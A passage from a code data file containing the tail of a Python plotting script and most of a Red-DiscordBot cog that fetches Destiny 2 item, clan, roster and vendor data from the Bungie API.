zeros)\")\r\n\r\n ax = fig.add_subplot(gs[2, 0])\r\n sns.violinplot(data=rowCountMax)\r\n ax.set_xlabel(\"Max per row\")\r\n\r\n fig.tight_layout()\r\n plt.savefig(join(outputDir, f'statsViolinPerRow-{\"\".join(metapath)}.png'))\r\n plt.close()\r\n\r\n # Plot as matrix\r\n \"\"\"\r\n fig = plt.figure(figsize=(15, 15))\r\n ax = plt.axes()\r\n plt.spy(similarityM, precision=0.1, marker='.', markersize=0.05)\r\n plt.savefig(join(outputDir, f'similarityMatrixPlot-{\"\".join(metapath)}.png'))\r\n plt.close()\r\n \"\"\"\r\n\r\n\r\n\r\n # Select top k most similiar or wtv\r\n\r\n # Pick their similarity vectors\r\n\r\n # Plot them\r\n\r\n except Exception as ex:\r\n print(traceback.format_exc())"} {"ext": "py", "sha": "1a2f0e93aaa88f132ac65f9112e7d1e015d40235", "content": "import asyncio\nimport datetime\nimport logging\nimport json\nimport functools\nimport re\nimport csv\nfrom io import StringIO, BytesIO\nfrom pathlib import Path\nfrom tabulate import tabulate\nfrom typing import List, Literal, Optional, Union\n\nimport discord\nfrom redbot.core import Config, checks, commands\nfrom redbot.core.i18n import Translator, cog_i18n\nfrom redbot.core.utils.chat_formatting import pagify, humanize_timedelta, humanize_list, box\nfrom redbot.core.utils.menus import start_adding_reactions\nfrom redbot.core.utils.predicates import ReactionPredicate\n\nfrom .api import DestinyAPI\nfrom .converter import DestinyActivity, StatsPage, SearchInfo, DestinyEververseItemType\nfrom .errors import Destiny2APIError, Destiny2MissingManifest\nfrom .menus import BaseMenu, BasePages\n\nDEV_BOTS = [552261846951002112]\n# If you want parsing the manifest data to be easier add your\n# bots ID to this list otherwise this should help performance\n# on bots that are just running the cog like normal\n\nBASE_URL = \"https://www.bungie.net/Platform\"\nIMAGE_URL = \"https://www.bungie.net\"\nAUTH_URL = 
\"https://www.bungie.net/en/oauth/authorize\"\nTOKEN_URL = \"https://www.bungie.net/platform/app/oauth/token/\"\n_ = Translator(\"Destiny\", __file__)\nlog = logging.getLogger(\"red.trusty-cogs.Destiny\")\n\n\n@cog_i18n(_)\nclass Destiny(DestinyAPI, commands.Cog):\n \"\"\"\n Get information from the Destiny 2 API\n \"\"\"\n\n __version__ = \"1.5.5\"\n __author__ = \"TrustyJAID\"\n\n def __init__(self, bot):\n self.bot = bot\n default_global = {\n \"api_token\": {\"api_key\": \"\", \"client_id\": \"\", \"client_secret\": \"\"},\n \"manifest_version\": \"\",\n }\n default_user = {\"oauth\": {}, \"account\": {}}\n self.config = Config.get_conf(self, 35689771456)\n self.config.register_global(**default_global)\n self.config.register_user(**default_user)\n self.config.register_guild(clan_id=None)\n self.throttle: float = 0\n\n def format_help_for_context(self, ctx: commands.Context) -> str:\n \"\"\"\n Thanks Sinbad!\n \"\"\"\n pre_processed = super().format_help_for_context(ctx)\n return f\"{pre_processed}\\n\\nCog Version: {self.__version__}\"\n\n async def red_delete_data_for_user(\n self,\n *,\n requester: Literal[\"discord_deleted_user\", \"owner\", \"user\", \"user_strict\"],\n user_id: int,\n ):\n \"\"\"\n Method for finding a user's data inside the cog and deleting it.\n \"\"\"\n await self.config.user_from_id(user_id).clear()\n\n @commands.group()\n async def destiny(self, ctx: commands.Context) -> None:\n \"\"\"Get information from the Destiny 2 API\"\"\"\n pass\n\n @destiny.command()\n async def forgetme(self, ctx: commands.Context) -> None:\n \"\"\"\n Remove your authorization to the destiny API on the bot\n \"\"\"\n await self.red_delete_data_for_user(requester=\"user\", user_id=ctx.author.id)\n await ctx.send(_(\"Your authorization has been reset.\"))\n\n @destiny.group(aliases=[\"s\"])\n async def search(self, ctx: commands.Context) -> None:\n \"\"\"\n Search for a destiny item, vendor, record, etc.\n \"\"\"\n pass\n\n async def get_weapon_possible_perks(self, weapon: dict) -> dict:\n perks = {}\n slot_counter = 1\n count = 2\n for socket in weapon[\"sockets\"][\"socketEntries\"]:\n if socket[\"singleInitialItemHash\"] in [\n 4248210736,\n 2323986101,\n 0,\n 2285418970,\n 1282012138,\n 2993594586,\n ]:\n continue\n if socket[\"socketTypeHash\"] in [2218962841, 1282012138, 1456031260]:\n continue\n if \"randomizedPlugSetHash\" in socket:\n pool = (\n await self.get_definition(\n \"DestinyPlugSetDefinition\", [socket[\"randomizedPlugSetHash\"]]\n )\n )[str(socket[\"randomizedPlugSetHash\"])]\n pool_perks = [v[\"plugItemHash\"] for v in pool[\"reusablePlugItems\"]]\n all_perks = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\", pool_perks\n )\n try:\n # https://stackoverflow.com/questions/44914727/get-first-and-second-values-in-dictionary-in-cpython-3-6\n it = iter(all_perks.values())\n key_hash = next(it)[\"itemCategoryHashes\"][0]\n key_data = (\n await self.get_definition(\"DestinyItemCategoryDefinition\", [key_hash])\n )[str(key_hash)]\n key = key_data[\"displayProperties\"][\"name\"]\n if key in perks:\n key = f\"{key} {count}\"\n count += 1\n except IndexError:\n key = _(\"Perk {count}\").format(count=slot_counter)\n perks[key] = \"\\n\".join(\n [p[\"displayProperties\"][\"name\"] for h, p in all_perks.items()]\n )\n slot_counter += 1\n continue\n if \"reusablePlugSetHash\" in socket:\n pool = (\n await self.get_definition(\n \"DestinyPlugSetDefinition\", [socket[\"reusablePlugSetHash\"]]\n )\n )[str(socket[\"reusablePlugSetHash\"])]\n pool_perks = 
[v[\"plugItemHash\"] for v in pool[\"reusablePlugItems\"]]\n all_perks = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\", pool_perks\n )\n try:\n it = iter(all_perks.values())\n key_hash = next(it)[\"itemCategoryHashes\"][0]\n key_data = (\n await self.get_definition(\"DestinyItemCategoryDefinition\", [key_hash])\n )[str(key_hash)]\n key = key_data[\"displayProperties\"][\"name\"]\n if key in perks:\n key = f\"{key} {count}\"\n count += 1\n except IndexError:\n key = _(\"Perk {count}\").format(count=slot_counter)\n perks[key] = \"\\n\".join(\n [p[\"displayProperties\"][\"name\"] for h, p in all_perks.items()]\n )\n slot_counter += 1\n continue\n perk_hash = socket[\"singleInitialItemHash\"]\n perk = (await self.get_definition(\"DestinyInventoryItemLiteDefinition\", [perk_hash]))[\n str(perk_hash)\n ]\n try:\n it = iter(all_perks.values())\n key_hash = next(it)[\"itemCategoryHashes\"][0]\n key_data = (\n await self.get_definition(\"DestinyItemCategoryDefinition\", [key_hash])\n )[str(key_hash)]\n key = key_data[0][\"displayProperties\"][\"name\"]\n if key in perks:\n key = f\"{key} {count}\"\n count += 1\n except (IndexError, KeyError):\n key = _(\"Perk {count}\").format(count=slot_counter)\n perks[key] = perk[\"displayProperties\"][\"name\"]\n slot_counter += 1\n return perks\n\n @search.command(aliases=[\"item\"])\n @commands.bot_has_permissions(embed_links=True)\n @commands.max_concurrency(1, commands.BucketType.default)\n async def items(\n self, ctx: commands.Context, details_or_lore: Optional[SearchInfo] = None, *, search: str\n ) -> None:\n \"\"\"\n Search for a specific item in Destiny 2\n\n `[details_or_lore]` signify what information to display for the item\n by default this command will show all available perks on weapons\n using `details`, `true`, or `stats` will show the weapons stat bars\n using `lore` here will instead display the weapons lore card instead if it exists.\n \"\"\"\n show_lore = True if details_or_lore is False else False\n if search.startswith(\"lore \"):\n search = search.replace(\"lore \", \"\")\n async with ctx.typing():\n try:\n items = await self.search_definition(\"DestinyInventoryItemDefinition\", search)\n except Destiny2MissingManifest as e:\n await ctx.send(e)\n return\n if not items:\n await ctx.send(_(\"`{search}` could not be found.\").format(search=search))\n return\n embeds = []\n # log.debug(items[0])\n for item_hash, item in items.items():\n if not (item[\"equippable\"]):\n continue\n embed = discord.Embed()\n description = item[\"flavorText\"] + \"\\n\\n\"\n damage_type = \"\"\n try:\n damage_data = (\n await self.get_definition(\n \"DestinyDamageTypeDefinition\", [item[\"defaultDamageTypeHash\"]]\n )\n )[str(item[\"defaultDamageTypeHash\"])]\n damage_type = damage_data[\"displayProperties\"][\"name\"]\n except KeyError:\n pass\n if item[\"itemType\"] in [3] and not show_lore:\n\n stats_str = \"\"\n rpm = \"\"\n recoil = \"\"\n magazine = \"\"\n for stat_hash, value in item[\"stats\"][\"stats\"].items():\n if stat_hash in [\"1935470627\", \"1480404414\", \"1885944937\"]:\n continue\n\n stat_info = (\n await self.get_definition(\"DestinyStatDefinition\", [stat_hash])\n )[str(stat_hash)]\n stat_name = stat_info[\"displayProperties\"][\"name\"]\n if not stat_name:\n continue\n prog = \"█\" * int(value[\"value\"] / 10)\n empty = \"░\" * int((100 - value[\"value\"]) / 10)\n bar = f\"{prog}{empty}\"\n if stat_hash == \"4284893193\":\n rpm = f\"{stat_name}: **{value['value']}**\\n\"\n continue\n if stat_hash == \"3871231066\":\n 
recoil = f\"{stat_name}: **{value['value']}**\\n\"\n continue\n if stat_hash == \"2715839340\":\n magazine = f\"{stat_name}: **{value['value']}**\\n\"\n continue\n if details_or_lore:\n stats_str += f\"{stat_name}: **{value['value']}** \\n{bar}\\n\"\n stats_str += rpm + recoil + magazine\n description += stats_str\n embed.description = description\n perks = await self.get_weapon_possible_perks(item)\n for key, value in perks.items():\n embed.add_field(name=key, value=value[:1024])\n if \"loreHash\" in item and (show_lore or item[\"itemType\"] in [2]):\n lore = (\n await self.get_definition(\"DestinyLoreDefinition\", [item[\"loreHash\"]])\n )[str(item[\"loreHash\"])]\n description += _(\"Lore: \\n\\n\") + lore[\"displayProperties\"][\"description\"]\n if len(description) > 2048:\n count = 0\n for page in pagify(description, page_length=1024):\n if count == 0:\n embed.description = page\n else:\n embed.add_field(name=_(\"Lore Continued\"), value=page)\n count += 1\n else:\n embed.description = description\n embed.title = damage_type + \" \" + item[\"itemTypeAndTierDisplayName\"]\n name = item[\"displayProperties\"][\"name\"]\n icon_url = IMAGE_URL + item[\"displayProperties\"][\"icon\"]\n embed.set_author(name=name, icon_url=icon_url)\n embed.set_thumbnail(url=icon_url)\n if item.get(\"screenshot\", False):\n embed.set_image(url=IMAGE_URL + item[\"screenshot\"])\n embeds.append(embed)\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n async def check_gilded_title(self, chars: dict, title: dict) -> bool:\n \"\"\"\n Checks a players records for a completed gilded title\n \"\"\"\n gilding_hash = title[\"titleInfo\"].get(\"gildingTrackingRecordHash\", None)\n records = chars[\"profileRecords\"][\"data\"][\"records\"]\n if str(gilding_hash) in records:\n for objective in records[str(gilding_hash)][\"objectives\"]:\n if objective[\"complete\"]:\n return True\n return False\n\n @destiny.command(name=\"joinme\")\n @commands.bot_has_permissions(embed_links=True)\n async def destiny_join_command(self, ctx: commands.Context) -> None:\n \"\"\"\n Get your Steam ID to give people to join your in-game fireteam\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n bungie_id = await self.config.user(ctx.author).oauth.membership_id()\n creds = await self.get_bnet_user(ctx.author, bungie_id)\n steam_id = \"\"\n for cred in creds:\n if \"credentialAsString\" in cred:\n steam_id = cred[\"credentialAsString\"]\n join_code = f\"\\n```py\\n/join {steam_id}\\n```\"\n msg = _(\n \"Use the following code in game to join {author}'s Fireteam:{join_code}\"\n ).format(author=ctx.author.display_name, join_code=join_code)\n join_code = f\"\\n```py\\n/join {steam_id}\\n```\"\n await ctx.send(msg)\n\n @destiny.group()\n @commands.bot_has_permissions(embed_links=True)\n async def clan(self, ctx: commands.Context) -> None:\n \"\"\"\n Clan settings\n \"\"\"\n return\n\n @clan.command(name=\"info\")\n @commands.bot_has_permissions(embed_links=True)\n async def show_clan_info(self, ctx: commands.Context, clan_id: Optional[str]):\n \"\"\"\n Display basic information about the clan set in this server\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command 
will work.\"\n )\n return await ctx.send(msg)\n if clan_id:\n clan_re = re.compile(\n r\"(https:\\/\\/)?(www\\.)?bungie\\.net\\/.*(groupid=(\\d+))\", flags=re.I\n )\n clan_invite = clan_re.search(clan_id)\n if clan_invite:\n clan_id = clan_invite.group(4)\n else:\n clan_id = await self.config.guild(ctx.guild).clan_id()\n if not clan_id:\n return await ctx.send(\n _(\n \"No clan ID has been setup for this server. \"\n \"Use `{prefix}destiny clan set` to set one.\"\n ).format(prefix=ctx.clean_prefix)\n )\n try:\n clan_info = await self.get_clan_info(ctx.author, clan_id)\n embed = await self.make_clan_embed(clan_info)\n except Exception:\n log.exception(\"Error getting clan info\")\n return await ctx.send(\n _(\"I could not find any information about this servers clan.\")\n )\n else:\n await ctx.send(embed=embed)\n\n async def make_clan_embed(self, clan_info: dict) -> discord.Embed:\n clan_id = clan_info[\"detail\"][\"groupId\"]\n clan_name = clan_info[\"detail\"][\"name\"]\n clan_about = clan_info[\"detail\"][\"about\"]\n clan_motto = clan_info[\"detail\"][\"motto\"]\n clan_callsign = clan_info[\"detail\"][\"clanInfo\"][\"clanCallsign\"]\n clan_xp_data = clan_info[\"detail\"][\"clanInfo\"][\"d2ClanProgressions\"][\"584850370\"]\n weekly_progress = clan_xp_data[\"weeklyProgress\"]\n weekly_limit = clan_xp_data[\"weeklyLimit\"]\n level = clan_xp_data[\"level\"]\n level_cap = clan_xp_data[\"levelCap\"]\n members = clan_info[\"detail\"][\"memberCount\"]\n max_members = clan_info[\"detail\"][\"features\"][\"maximumMembers\"]\n clan_creation_date = datetime.datetime.strptime(\n clan_info[\"detail\"][\"creationDate\"], \"%Y-%m-%dT%H:%M:%S.%fZ\"\n )\n clan_create_str = clan_creation_date.strftime(\"%I:%M %p %Y-%m-%d\")\n clan_xp_str = _(\n \"Level: {level}/{level_cap}\\nWeekly Progress: \" \"{weekly_progress}/{weekly_limit}\"\n ).format(\n level=level,\n level_cap=level_cap,\n weekly_progress=weekly_progress,\n weekly_limit=weekly_limit,\n )\n\n join_link = f\"https://www.bungie.net/en/ClanV2?groupid={clan_id}\"\n embed = discord.Embed(\n title=f\"{clan_name} [{clan_callsign}]\", description=clan_about, url=join_link\n )\n embed.add_field(name=_(\"Motto\"), value=clan_motto, inline=False)\n embed.add_field(name=_(\"Clan XP\"), value=clan_xp_str)\n embed.add_field(name=_(\"Members\"), value=f\"{members}/{max_members}\")\n embed.add_field(name=_(\"Clan Founded\"), value=clan_create_str)\n return embed\n\n @clan.command(name=\"set\")\n @commands.bot_has_permissions(embed_links=True)\n @commands.admin_or_permissions(manage_guild=True)\n async def set_clan_id(self, ctx: commands.Context, clan_id: str) -> None:\n \"\"\"\n Set the clan ID for this server\n\n `` Must be either the clan's ID or you can provide\n the clan invite link at the `clan profile` setting on bungie.net\n\n example link: `https://www.bungie.net/en/ClanV2?groupid=1234567`\n the numbers after `groupid=` is the clan ID.\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n clan_re = re.compile(\n r\"(https:\\/\\/)?(www\\.)?bungie\\.net\\/.*(groupid=(\\d+))\", flags=re.I\n )\n clan_invite = clan_re.search(clan_id)\n if clan_invite:\n clan_id = clan_invite.group(4)\n try:\n clan_info = await self.get_clan_info(ctx.author, clan_id)\n embed = await self.make_clan_embed(clan_info)\n except Exception:\n log.exception(\"Error getting clan info\")\n return await ctx.send(_(\"I could not find a clan 
with that ID.\"))\n else:\n await self.config.guild(ctx.guild).clan_id.set(clan_id)\n await ctx.send(_(\"Server's clan set to\"), embed=embed)\n\n async def destiny_pick_profile(\n self, ctx: commands.Context, pending_users: dict\n ) -> Optional[dict]:\n \"\"\"\n Allows a clan admin to pick the user they want to approve in the clan\n \"\"\"\n users = pending_users[\"results\"][:9]\n embed = discord.Embed(\n title=_(\"Pending Clan Members\"),\n description=_(\"React with the user you would like to approve into the clan.\"),\n )\n for index, user in enumerate(pending_users[\"results\"]):\n destiny_name = user[\"destinyUserInfo\"][\"LastSeenDisplayName\"]\n bungie_name = user[\"bungieNetUserInfo\"][\"displayName\"]\n msg = _(\"Destiny/Steam Name: {destiny_name}\\nBungie.net Name: {bungie_name}\").format(\n destiny_name=destiny_name, bungie_name=bungie_name\n )\n embed.add_field(name=_(\"User {count}\").format(count=index + 1), value=msg)\n msg = await ctx.send(embed=embed)\n emojis = ReactionPredicate.NUMBER_EMOJIS[1 : len(users) + 1]\n start_adding_reactions(msg, emojis)\n pred = ReactionPredicate.with_emojis(emojis, msg)\n try:\n await ctx.bot.wait_for(\"reaction_add\", check=pred)\n except asyncio.TimeoutError:\n return None\n else:\n return users[pred.result]\n\n @clan.command(name=\"pending\")\n @commands.bot_has_permissions(embed_links=True)\n @commands.admin_or_permissions(manage_guild=True)\n async def clan_pending(self, ctx: commands.Context) -> None:\n \"\"\"\n Display pending clan members.\n\n Clan admin can further approve specified clan members\n by reacting to the resulting message.\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n clan_id = await self.config.guild(ctx.guild).clan_id()\n if not clan_id:\n return await ctx.send(\n _(\n \"No clan ID has been setup for this server. 
\"\n \"Use `{prefix}destiny clan set` to set one.\"\n ).format(prefix=ctx.clean_prefix)\n )\n clan_pending = await self.get_clan_pending(ctx.author, clan_id)\n if not clan_pending[\"results\"]:\n return await ctx.send(_(\"There is no one pending clan approval.\"))\n approved = await self.destiny_pick_profile(ctx, clan_pending)\n if not approved:\n return await ctx.send(_(\"No one will be approved into the clan.\"))\n try:\n destiny_name = approved[\"destinyUserInfo\"][\"LastSeenDisplayName\"]\n bungie_name = approved[\"bungieNetUserInfo\"][\"displayName\"]\n membership_id = approved[\"destinyUserInfo\"][\"membershipId\"]\n membership_type = approved[\"destinyUserInfo\"][\"membershipType\"]\n await self.approve_clan_pending(\n ctx.author, clan_id, membership_type, membership_id, approved\n )\n except Destiny2APIError as e:\n log.exception(\"error approving clan member.\")\n await ctx.send(str(e))\n else:\n await ctx.send(\n _(\"{destiny_name} AKA {bungie_name} has been approved into the clan.\").format(\n destiny_name=destiny_name, bungie_name=bungie_name\n )\n )\n\n @clan.command(name=\"roster\")\n @commands.bot_has_permissions(embed_links=True)\n @commands.mod_or_permissions(manage_messages=True)\n async def get_clan_roster(self, ctx: commands.Context, output_format: Optional[str]) -> None:\n \"\"\"\n Get the full clan roster\n\n `[output_format]` if `csv` is provided this will upload a csv file of\n the clan roster instead of displaying the output.\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n clan_id = await self.config.guild(ctx.guild).clan_id()\n if not clan_id:\n return await ctx.send(\n _(\n \"No clan ID has been setup for this server. 
\"\n \"Use `{prefix}destiny clan set` to set one.\"\n ).format(prefix=ctx.clean_prefix)\n )\n clan = await self.get_clan_members(ctx.author, clan_id)\n headers = [\n \"Discord Name\",\n \"Discord ID\",\n \"Destiny Name\",\n \"Destiny ID\",\n \"Bungie.net Name\",\n \"Bungie.net ID\",\n \"Last Seen Destiny\",\n \"Steam ID\",\n \"Join Date\",\n ]\n clan_mems = \"\"\n rows = []\n saved_users = await self.config.all_users()\n for member in clan[\"results\"]:\n last_online = datetime.datetime.utcfromtimestamp(\n int(member[\"lastOnlineStatusChange\"])\n )\n join_date = datetime.datetime.strptime(member[\"joinDate\"], \"%Y-%m-%dT%H:%M:%SZ\")\n destiny_name = member[\"destinyUserInfo\"][\"LastSeenDisplayName\"]\n destiny_id = member[\"destinyUserInfo\"][\"membershipId\"]\n clan_mems += destiny_name + \"\\n\"\n discord_id = None\n discord_name = None\n bungie_id = None\n bungie_name = None\n steam_id = None\n try:\n bungie_id = member[\"bungieNetUserInfo\"][\"membershipId\"]\n bungie_name = member[\"bungieNetUserInfo\"][\"displayName\"]\n creds = await self.get_bnet_user(ctx.author, bungie_id)\n steam_id = \"\"\n for cred in creds:\n if \"credentialAsString\" in cred:\n steam_id = cred[\"credentialAsString\"]\n except Exception:\n pass\n for user_id, data in saved_users.items():\n if data[\"oauth\"][\"membership_id\"] == bungie_id:\n discord_user = ctx.guild.get_member(int(user_id))\n if discord_user:\n discord_name = str(discord_user)\n discord_id = discord_user.id\n\n user_info = [\n discord_name,\n f\"'{discord_id}\" if discord_id else None,\n destiny_name,\n f\"'{destiny_id}\" if destiny_id else None,\n bungie_name,\n f\"'{bungie_id}\" if bungie_id else None,\n last_online,\n f\"'{steam_id}\" if steam_id else None,\n str(join_date),\n ]\n rows.append(user_info)\n if output_format == \"csv\":\n outfile = StringIO()\n employee_writer = csv.writer(\n outfile, delimiter=\",\", quotechar='\"', quoting=csv.QUOTE_MINIMAL\n )\n employee_writer.writerow(headers)\n for row in rows:\n employee_writer.writerow(row)\n outfile.seek(0)\n file = discord.File(outfile, filename=\"clan_roster.csv\")\n await ctx.send(file=file)\n elif output_format == \"md\":\n data = tabulate(rows, headers=headers, tablefmt=\"github\")\n file = discord.File(BytesIO(data.encode()), filename=\"clan_roster.md\")\n await ctx.send(file=file)\n else:\n data = tabulate(rows, headers=headers, tablefmt=\"pretty\")\n for page in pagify(data, page_length=1990):\n await ctx.send(box(page, lang=\"css\"))\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True)\n async def user(self, ctx: commands.Context, user: discord.Member = None) -> None:\n \"\"\"\n Display a menu of your basic character's info\n `[user]` A member on the server who has setup their account on this bot.\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx, user):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n if not user:\n user = ctx.author\n try:\n chars = await self.get_characters(user)\n # await self.save(chars, \"character.json\")\n except Destiny2APIError as e:\n log.error(e, exc_info=True)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n embeds = []\n currency_datas = await self.get_definition(\n \"DestinyInventoryItemLiteDefinition\",\n [v[\"itemHash\"] for v in chars[\"profileCurrencies\"][\"data\"][\"items\"]],\n )\n player_currency = \"\"\n for item in chars[\"profileCurrencies\"][\"data\"][\"items\"]:\n 
quantity = item[\"quantity\"]\n name = currency_datas[str(item[\"itemHash\"])][\"displayProperties\"][\"name\"]\n player_currency += f\"{name}: **{quantity}**\\n\"\n\n for char_id, char in chars[\"characters\"][\"data\"].items():\n info = \"\"\n race = (await self.get_definition(\"DestinyRaceDefinition\", [char[\"raceHash\"]]))[\n str(char[\"raceHash\"])\n ]\n gender = (\n await self.get_definition(\"DestinyGenderDefinition\", [char[\"genderHash\"]])\n )[str(char[\"genderHash\"])]\n char_class = (\n await self.get_definition(\"DestinyClassDefinition\", [char[\"classHash\"]])\n )[str(char[\"classHash\"])]\n info += \"{race} {gender} {char_class} \".format(\n race=race[\"displayProperties\"][\"name\"],\n gender=gender[\"displayProperties\"][\"name\"],\n char_class=char_class[\"displayProperties\"][\"name\"],\n )\n titles = \"\"\n if \"titleRecordHash\" in char:\n # TODO: Add fetch for Destiny.Definitions.Records.DestinyRecordDefinition\n char_title = (\n await self.get_definition(\n \"DestinyRecordDefinition\", [char[\"titleRecordHash\"]]\n )\n )[str(char[\"titleRecordHash\"])]\n title_info = \"**{title_name}**\\n{title_desc}\\n\"\n try:\n gilded = \"\"\n if await self.check_gilded_title(chars, char_title):\n gilded = _(\"Gilded \")\n title_name = (\n f\"{gilded}\"\n + char_title[\"titleInfo\"][\"titlesByGenderHash\"][\n str(char[\"genderHash\"])\n ]\n )\n title_desc = char_title[\"displayProperties\"][\"description\"]\n titles += title_info.format(title_name=title_name, title_desc=title_desc)\n except KeyError:\n pass\n embed = discord.Embed(title=info)\n embed.set_author(name=user.display_name, icon_url=user.avatar_url)\n if \"emblemPath\" in char:\n embed.set_thumbnail(url=IMAGE_URL + char[\"emblemPath\"])\n if titles:\n # embed.add_field(name=_(\"Titles\"), value=titles)\n embed.set_author(\n name=f\"{user.display_name} ({title_name})\", icon_url=user.avatar_url\n )\n # log.debug(data)\n stats_str = \"\"\n time_played = humanize_timedelta(seconds=int(char[\"minutesPlayedTotal\"]) * 60)\n for stat_hash, value in char[\"stats\"].items():\n stat_info = (await self.get_definition(\"DestinyStatDefinition\", [stat_hash]))[\n str(stat_hash)\n ]\n stat_name = stat_info[\"displayProperties\"][\"name\"]\n prog = \"█\" * int(value / 10)\n empty = \"░\" * int((100 - value) / 10)\n bar = f\"{prog}{empty}\"\n if stat_hash == \"1935470627\":\n bar = \"\"\n stats_str += f\"{stat_name}: **{value}** \\n{bar}\\n\"\n stats_str += _(\"Time Played Total: **{time}**\").format(time=time_played)\n embed.description = stats_str\n embed = await self.get_char_colour(embed, char)\n if titles:\n embed.add_field(name=_(\"Titles\"), value=titles)\n embed.add_field(name=_(\"Current Currencies\"), value=player_currency)\n embeds.append(embed)\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n @search.command()\n @commands.bot_has_permissions(embed_links=True)\n async def lore(self, ctx: commands.Context, entry: str = None) -> None:\n \"\"\"\n Find Destiny Lore\n \"\"\"\n try:\n # the below is to prevent blocking reading the large\n # ~130mb manifest files and save on API calls\n task = functools.partial(self.get_entities, entity=\"DestinyLoreDefinition\")\n task = self.bot.loop.run_in_executor(None, task)\n data: dict = await asyncio.wait_for(task, timeout=60)\n except Exception:\n return await ctx.send(_(\"The manifest needs to be downloaded for this to work.\"))\n lore = []\n for 
entry_hash, entries in data.items():\n em = discord.Embed(title=entries[\"displayProperties\"][\"name\"])\n description = entries[\"displayProperties\"][\"description\"]\n if len(description) < 2048:\n em.description = entries[\"displayProperties\"][\"description\"]\n elif len(description) > 2048 and len(description) < 6000:\n em.description = description[:2048]\n new_desc = description[:2048]\n parts = [new_desc[i : i + 1024] for i in range(0, len(new_desc), 1024)]\n for i in parts:\n em.add_field(name=_(\"Continued\"), value=i)\n\n if entries[\"displayProperties\"][\"hasIcon\"]:\n icon = entries[\"displayProperties\"][\"icon\"]\n em.set_thumbnail(url=f\"{IMAGE_URL}{icon}\")\n lore.append(em)\n if entry:\n for t in lore:\n if entry.lower() in str(t.title).lower():\n print(t.title)\n lore.insert(0, lore.pop(lore.index(t)))\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n async def save(self, data: dict, loc: str = \"sample.json\"):\n if self.bot.user.id not in DEV_BOTS:\n return\n base_path = Path(__file__).parent\n path = base_path / loc\n with path.open(encoding=\"utf-8\", mode=\"w\") as f:\n json.dump(data, f, indent=4, sort_keys=False, separators=(\",\", \" : \"))\n\n @destiny.command(aliases=[\"xûr\"])\n @commands.bot_has_permissions(embed_links=True)\n async def xur(self, ctx: commands.Context, full: bool = False) -> None:\n \"\"\"\n Display a menu of Xûr's current wares\n\n `[full=False]` Show perk definition on Xûr's current wares\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n try:\n chars = await self.get_characters(ctx.author)\n # await self.save(chars, \"characters.json\")\n except Destiny2APIError:\n # log.debug(e)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n for char_id, char in chars[\"characters\"][\"data\"].items():\n # log.debug(char)\n try:\n xur = await self.get_vendor(ctx.author, char_id, \"2190858386\")\n xur_def = (\n await self.get_definition(\"DestinyVendorDefinition\", [\"2190858386\"])\n )[\"2190858386\"]\n except Destiny2APIError:\n log.error(\"I can't seem to see Xûr at the moment\")\n today = datetime.datetime.utcnow()\n friday = today.replace(hour=17, minute=0, second=0) + datetime.timedelta(\n (4 - today.weekday()) % 7\n )\n next_xur = self.humanize_timedelta(timedelta=(friday - today))\n await ctx.send(\n _(\"Xûr's not around, come back in {next_xur}.\").format(next_xur=next_xur)\n )\n return\n break\n # items = [v[\"itemHash\"] for k, v in xur[\"sales\"][\"data\"].items()]\n embeds: List[discord.Embed] = []\n # data = await self.get_definition(\"DestinyInventoryItemDefinition\", items)\n embed = discord.Embed(\n colour=discord.Colour.red(),\n description=xur_def[\"displayProperties\"][\"description\"],\n )\n embed.set_thumbnail(\n url=IMAGE_URL + xur_def[\"displayProperties\"][\"largeTransparentIcon\"]\n )\n embed.set_author(name=\"Xûr's current wares\")\n # location = xur_def[\"locations\"][0][\"destinationHash\"]\n # log.debug(await self.get_definition(\"DestinyDestinationDefinition\", [location]))\n for index, item_base in xur[\"sales\"][\"data\"].items():\n item = (\n await self.get_definition(\n \"DestinyInventoryItemDefinition\", [item_base[\"itemHash\"]]\n )\n )[str(item_base[\"itemHash\"])]\n if not 
